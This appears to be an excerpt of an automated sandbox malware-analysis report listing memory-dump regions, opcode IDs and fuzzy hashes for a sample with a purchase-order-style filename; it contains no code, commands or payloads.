                                                          • Source File: 00000000.00000002.1729797626.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_97d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f271ebaea3f7b8b8f05eaa09443cafd3d77cea0f012033950efce7e32be99a
                                                          • Instruction ID: e127386deee7242c4e547eceef7589db73b3aab2a0e034d1f540e6b90e49532c
                                                          • Opcode Fuzzy Hash: 14f271ebaea3f7b8b8f05eaa09443cafd3d77cea0f012033950efce7e32be99a
                                                          • Instruction Fuzzy Hash: D82130B2505200DFCB04DF14C9C0B26BF7AFF98324F20C969E80D0B246C33AD846CAA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a03460bbcce7b0f67e972a80b62b0e1954245499d2077565c27f8768bf4a926
                                                          • Instruction ID: 279ae65d3fb01181c8b63f09f7de7bd337c61eb3012ae86a506b975ad4551737
                                                          • Opcode Fuzzy Hash: 3a03460bbcce7b0f67e972a80b62b0e1954245499d2077565c27f8768bf4a926
                                                          • Instruction Fuzzy Hash: AA315170D01209EFD704DFA9D0A87AEFBF1FB89304FA0C1A9D449A7254D7B44A85CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22e4381b6bcd78ef78c46a97b7b7294886f03c8a41371795a9deb216a168b9bf
                                                          • Instruction ID: c757c7e3e0f93c45aa74dd2390ebf7b097e0b6aec9ac69a3eb86df631a302834
                                                          • Opcode Fuzzy Hash: 22e4381b6bcd78ef78c46a97b7b7294886f03c8a41371795a9deb216a168b9bf
                                                          • Instruction Fuzzy Hash: 47217870D04219DBDB06DFA9D8446EEBBF6FB88306F00843AD409B7241DB785A45CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729856874.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_98d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 639988da9f80989af28d924c311fa7165110ee88990b921e83c37bc3d5991244
                                                          • Instruction ID: fbba5eaa21eedfdef39a2a32849b3e6b1c9f965a5a53478ebac91f3af0e7ae19
                                                          • Opcode Fuzzy Hash: 639988da9f80989af28d924c311fa7165110ee88990b921e83c37bc3d5991244
                                                          • Instruction Fuzzy Hash: A02104B1509244DFDB15EF14D9C4B26BF69FB84314F24CA69E9094B386C33AD807DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729856874.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_98d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f3db7a72d49c81ca38aa7a1ee90aca8375db685d2b99f9bc3c3b79558c5f688
                                                          • Instruction ID: 10addcb800eaba553ae56c9bc33aaa609eea2ab7a2c661fd8edbcdc0acd5e969
                                                          • Opcode Fuzzy Hash: 5f3db7a72d49c81ca38aa7a1ee90aca8375db685d2b99f9bc3c3b79558c5f688
                                                          • Instruction Fuzzy Hash: 4B215E7150E3C09FCB079F24D994716BF75AF46214F1981DBD8848F2A7C33A981ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21f261f097c79c003e73d404fc24ef08b8fb0c808ab684067327fe7fb6f7f13a
                                                          • Instruction ID: 8614b7f3a2ae77e841b74ab7eca3524779da51376153e8113681fbba7fae67c4
                                                          • Opcode Fuzzy Hash: 21f261f097c79c003e73d404fc24ef08b8fb0c808ab684067327fe7fb6f7f13a
                                                          • Instruction Fuzzy Hash: A2212936600105DFCB05DFA8E998E99BFB2FF49310B0640A9F6099B272C731EC15DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1855e6776ec46924f53b442bb12ac8417fc82be29cbb7231ce6b1f979fe5687d
                                                          • Instruction ID: 1747e3fd4ac41140c43b82870af90ca11c2cbed6b4e6942e04829641b62aa4ac
                                                          • Opcode Fuzzy Hash: 1855e6776ec46924f53b442bb12ac8417fc82be29cbb7231ce6b1f979fe5687d
                                                          • Instruction Fuzzy Hash: 59214C75A10108DBCB199FA8D844AEE7FB6FB8C321F14956AE911B7390CF75A841CF90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6a9192e6887e09c92390a03de864989759d4427a8cb7d5fd15e34d9a2832325
                                                          • Instruction ID: 02dfccbd95ca09d26dba97ea837512a32556aa187e86e5cd01aeaff6e6f701f3
                                                          • Opcode Fuzzy Hash: b6a9192e6887e09c92390a03de864989759d4427a8cb7d5fd15e34d9a2832325
                                                          • Instruction Fuzzy Hash: 62212570D05219CBDB06DFAAD5446EEBBF6FB88302F00842AD009B7241DB785A44CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 945ed340fde5738619ba1251db5a8c863c7d0f492b0d6a51262b67132f781983
                                                          • Instruction ID: 336332561ba8fe7337711ef4a68f7cae1b130ace9053374cfda0a24695ea50a7
                                                          • Opcode Fuzzy Hash: 945ed340fde5738619ba1251db5a8c863c7d0f492b0d6a51262b67132f781983
                                                          • Instruction Fuzzy Hash: 2021E675A002098FDF05DF94D585AEDBBF6FF88310F2045A5E405BB2A5CB75AD41CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4367b0866af70f94489ee0d75e8b45d229e7cdeb7bd4c7217090c97f5a53f620
                                                          • Instruction ID: 08e670a9f5367ddb48798b4b5f5beab7ca8472eeb198a65c19b9de0988a58378
                                                          • Opcode Fuzzy Hash: 4367b0866af70f94489ee0d75e8b45d229e7cdeb7bd4c7217090c97f5a53f620
                                                          • Instruction Fuzzy Hash: 20212CB0E04309DFCB15DFA9C584ABEBBB6FB49700F10C56AD819A7244DB749982CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db9af418dcee9c858710ec6d1bd23787f495a7c784996d67efa3d507c9323903
                                                          • Instruction ID: 21c8246fe4ebcee165b09ce1fd9895f65b69e141912d5a2c3530aad5ff9ddb8d
                                                          • Opcode Fuzzy Hash: db9af418dcee9c858710ec6d1bd23787f495a7c784996d67efa3d507c9323903
                                                          • Instruction Fuzzy Hash: D5215E75A006158FCB18DF65D845BAFBBF2FF88664F008979D906A7395EB34A801CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a5d5a06919498d2639dca1b6a7d41ff597642f0f10334a59c5200b9ad8a390a
                                                          • Instruction ID: 8a7ba79521b9eac6b1043d1c8b7bb2a454f9521a768b31e3f7f1cb202dd98114
                                                          • Opcode Fuzzy Hash: 1a5d5a06919498d2639dca1b6a7d41ff597642f0f10334a59c5200b9ad8a390a
                                                          • Instruction Fuzzy Hash: BF21F671A00209CFDB19DFA4C585AAE77F6FF88300F2145A5E405BB3A5CB75AD41CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 259f0d4e68e623d1a25b115d54be102df554e0f8a770d1c8c1e57ae1f3e2a855
                                                          • Instruction ID: 183fa4dce50ca047a50535ce4294157b67c8587536b5c2a52e1e9cdda7018e24
                                                          • Opcode Fuzzy Hash: 259f0d4e68e623d1a25b115d54be102df554e0f8a770d1c8c1e57ae1f3e2a855
                                                          • Instruction Fuzzy Hash: 37211632900248CFDB60CF6CD8497AE77B0EB08314F295869C18AE7250C774EE84DF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 255ed28b0de5c90c3fa521fd781d099996e5cdd4b19513480abeb84379dfc966
                                                          • Instruction ID: b8245e73bc127d081ee38854ce322cc7d0c145352b81c96585dbea3a7e4d89f5
                                                          • Opcode Fuzzy Hash: 255ed28b0de5c90c3fa521fd781d099996e5cdd4b19513480abeb84379dfc966
                                                          • Instruction Fuzzy Hash: F31193B57142504FCB54AB7C989899D3FE5EF8931571904E9E20ACB3A2DF60CC05CB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21443af9a90e7d5d5aff56996acb4ab1e232d7797c2dc6ed2d178b0c3cfaee35
                                                          • Instruction ID: bfe6e2741eb519ad2a8028dbbb15a3f54b3f98739fe02bc90ac9da9728769bb0
                                                          • Opcode Fuzzy Hash: 21443af9a90e7d5d5aff56996acb4ab1e232d7797c2dc6ed2d178b0c3cfaee35
                                                          • Instruction Fuzzy Hash: 4D21A1717103059FCB18EB78D8963AE7BE6EBC8300F008939F00AD7685DFB9694587A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec3a52195a442242cec6ab76e090f92e508590fe76438af171faa4b8079c3d86
                                                          • Instruction ID: cd24cf25c267335cb01d6d7f17b4ebab5a47f272935e8088ad5672b4d7d327b3
                                                          • Opcode Fuzzy Hash: ec3a52195a442242cec6ab76e090f92e508590fe76438af171faa4b8079c3d86
                                                          • Instruction Fuzzy Hash: E91106B5B142008FCB44EB7CD89996E3BE5EFCD75131105A9E10ADB3A2EE74DC058B60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01ed39f87d0e7e6da8a3f3b7ce54fbc86aba533df49b15c783b14d7c152e27e6
                                                          • Instruction ID: c8da5ce52409c2d801afe92fc9afd3f04b1c203f0fb00685611acc6bf76303d1
                                                          • Opcode Fuzzy Hash: 01ed39f87d0e7e6da8a3f3b7ce54fbc86aba533df49b15c783b14d7c152e27e6
                                                          • Instruction Fuzzy Hash: BE11BC70E4A1089BDB14DBA8C6456BDBFB5EB49210F04D5EDC81DA3291DA369E01CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f9b593388c0b1be8de9d41415d36148e81c789f61bda563089e9c9efe1576ee
                                                          • Instruction ID: 4975fa6f5a0ee6c0ca4e48f10d36e8d4e3fc3d342886dd57c96f9e28c1502b04
                                                          • Opcode Fuzzy Hash: 8f9b593388c0b1be8de9d41415d36148e81c789f61bda563089e9c9efe1576ee
                                                          • Instruction Fuzzy Hash: 1D11D035A04644CFDB15DF68F4846ACB7F2FB85326F28C1B6D4099B21ADB309845CF62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1673e58c0b54088f414dad3891e112892a01fac13a3ff3e847d4d9cf7b38d453
                                                          • Instruction ID: 390ed8f0412b5e0adfab685bf729faf84affa0d00285570913ff5aa9568fa406
                                                          • Opcode Fuzzy Hash: 1673e58c0b54088f414dad3891e112892a01fac13a3ff3e847d4d9cf7b38d453
                                                          • Instruction Fuzzy Hash: D5113CB5B542008FCB48AB7C949895E7BF6EFDD71131548A9E10ADB3B2EE70CC0587A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89039fddcd0cd467a91a3c9f4b633393c27e40e2661628c9872325f2d3740eb4
                                                          • Instruction ID: dde9d204e517b13665decc0ad0ef04f58f4f73769cd31229d47e199fcf397638
                                                          • Opcode Fuzzy Hash: 89039fddcd0cd467a91a3c9f4b633393c27e40e2661628c9872325f2d3740eb4
                                                          • Instruction Fuzzy Hash: 1D01CE3B900108EFCB02DF84D844D86BB76FF59721B0680E4E6096F232C232E825EB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6efd5dbdc225769b6f3e266f8c57fbd2d1b8372e5a494aa733d3b3fca442e9b8
                                                          • Instruction ID: f61246c210cb8a49656400cc34bf7553b5250a01e067a9decea95b36324e895b
                                                          • Opcode Fuzzy Hash: 6efd5dbdc225769b6f3e266f8c57fbd2d1b8372e5a494aa733d3b3fca442e9b8
                                                          • Instruction Fuzzy Hash: E7210670D0420DDFCF04DFA9D8886EEBBF6BB89316F108466D819A3241DB745A458F50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7313f49b0e2ce8508ddf310dfea4179491868f540fc3a3ec6a4bfd76db735a86
                                                          • Instruction ID: 87ccccb47c214ebe0b12ae42b8c2553f23821f18e1c297bd6f80fab4c26c11cb
                                                          • Opcode Fuzzy Hash: 7313f49b0e2ce8508ddf310dfea4179491868f540fc3a3ec6a4bfd76db735a86
                                                          • Instruction Fuzzy Hash: DE1163357002049FCB24DF79985576D7BF6BFC8610F148066FA16EB280DE35D941C790
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4228e42d4aee9c988ce3507cdcdbfa0c7b50e34ec8c238ddeb724b4f93fd548c
                                                          • Instruction ID: 9c622793528820edb8a3cfdd8751be28c91ddf8b937d1c1aaede2cd559451564
                                                          • Opcode Fuzzy Hash: 4228e42d4aee9c988ce3507cdcdbfa0c7b50e34ec8c238ddeb724b4f93fd548c
                                                          • Instruction Fuzzy Hash: B8110474D04219DFCB04CFAAD8456EEBBB6FF8C310F14842AD515B3250D7745945CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c6b36b2e1031ddb01399ce0d4c13bc203f0809604afff632301864c1e01b7f0
                                                          • Instruction ID: 6dc0d47afbcebefe8aca5920c206dfc46f007e94e22e93ef91debe2cfe7b28c4
                                                          • Opcode Fuzzy Hash: 8c6b36b2e1031ddb01399ce0d4c13bc203f0809604afff632301864c1e01b7f0
                                                          • Instruction Fuzzy Hash: 92118F76A04148CFDB04CF98E4806DDFBF2FB88325F38C562C005A7609C7349946CB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3600a8da042656265cec126b7617f5dcc50db0c36dced2955a897ea937eb053
                                                          • Instruction ID: 4e717eb3c2ec035a91cde99b0c8200fb7308d31f8ef56c5b40a4ab3ad9e368f3
                                                          • Opcode Fuzzy Hash: f3600a8da042656265cec126b7617f5dcc50db0c36dced2955a897ea937eb053
                                                          • Instruction Fuzzy Hash: 12318F78A022699FDB65CF28C994AD9BBB1FB48301F0481E9E858A7355D634AE81CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729797626.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_97d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                          • Instruction ID: 8b7ab92f4af5ec461fa31413ebf6e12d424ae3dfd29459cd74221e026a0d0531
                                                          • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                          • Instruction Fuzzy Hash: AD11AC76505280CFCB16CF10D9C4B16BF72FB98324F24C6A9D80D4B656C33AD85ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1be69ed97db73b0480227b9b5b1644cd1c08122e728713897fc0287d5e5c9d9
                                                          • Instruction ID: 7398885b0d13aca3e288489f618e3b86cdbe6c1a65d03f4fd64179f97a9efe4e
                                                          • Opcode Fuzzy Hash: b1be69ed97db73b0480227b9b5b1644cd1c08122e728713897fc0287d5e5c9d9
                                                          • Instruction Fuzzy Hash: 6B112E3A210200EFCB059F99D848D6A7BB6FF8C721B0680E9F6558B371CB32E851DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76f327a2555c716452094fbea7d86e963c85de9a184775c5fad1273a1f145f37
                                                          • Instruction ID: 8e2647c2b648afda5c17030cc40e18740c18ec8c4e1f944569a56fbdb0015d1d
                                                          • Opcode Fuzzy Hash: 76f327a2555c716452094fbea7d86e963c85de9a184775c5fad1273a1f145f37
                                                          • Instruction Fuzzy Hash: 6F215079A42219EFDB04CFA8D594AADBBB2FF49310F144194E902EB361CB74AD41CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b564f58a16273142e96c02d917f317c2c93663199cd7d091d040b64978d07e9b
                                                          • Instruction ID: 4f46d1c5a077659fb3ec008b397d27be7b126ff897d528ed40f5ff4dd65334c3
                                                          • Opcode Fuzzy Hash: b564f58a16273142e96c02d917f317c2c93663199cd7d091d040b64978d07e9b
                                                          • Instruction Fuzzy Hash: F001D231708260CFDB05CB78E854AFA7BE5EB99375F5580BBE50CC3665D63188418B21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d11c8f960a440e9027aab36add5dabfc1ba23685252b1064813524b6690aeaa
                                                          • Instruction ID: 69bdaf6204c0259dbb1aca1514fc9a63099efb1a4dade96bf26e45207a8ecaed
                                                          • Opcode Fuzzy Hash: 7d11c8f960a440e9027aab36add5dabfc1ba23685252b1064813524b6690aeaa
                                                          • Instruction Fuzzy Hash: A8112571B012449FCB04CB28DC98B9ABFF6EB89300F1440EAD108EB392DA35AD08CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c7f9c423a9a78bc76f007249e6db49c685ceb770558de097eacaa79234fd12c
                                                          • Instruction ID: a19a1dd7f49a71dc20ccb59572d885c6d2834e94f856be90b8104691d78a17eb
                                                          • Opcode Fuzzy Hash: 8c7f9c423a9a78bc76f007249e6db49c685ceb770558de097eacaa79234fd12c
                                                          • Instruction Fuzzy Hash: F201B5326082585FD758DAA9E444BEABFE4FB55230F1484EBF885CB290D631F990CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 454d8d5c4766a8c105c60877d19a69f48bced53b4045852fd2ce212053ece969
                                                          • Instruction ID: 86c073d10f99f58f4f435be38715c6f702292fdbcd98782ff76c72330f530e2c
                                                          • Opcode Fuzzy Hash: 454d8d5c4766a8c105c60877d19a69f48bced53b4045852fd2ce212053ece969
                                                          • Instruction Fuzzy Hash: C1214870A11218CFEB58EF18D894BA9BBB1FB88354F10C1E5E489A3344DB746E85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0387b53d78397cbb27253002a4cec8d37b05b7775c087707948d63de18d00f3
                                                          • Instruction ID: 6511fcb837ea57b85126af22f1ea387f855fe438f66e3345598a6051ea63672d
                                                          • Opcode Fuzzy Hash: e0387b53d78397cbb27253002a4cec8d37b05b7775c087707948d63de18d00f3
                                                          • Instruction Fuzzy Hash: 6021B574A042688FDB69DF24D848BAAB7F5FF49314F5050D9E44AA7291DB746E80CF02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
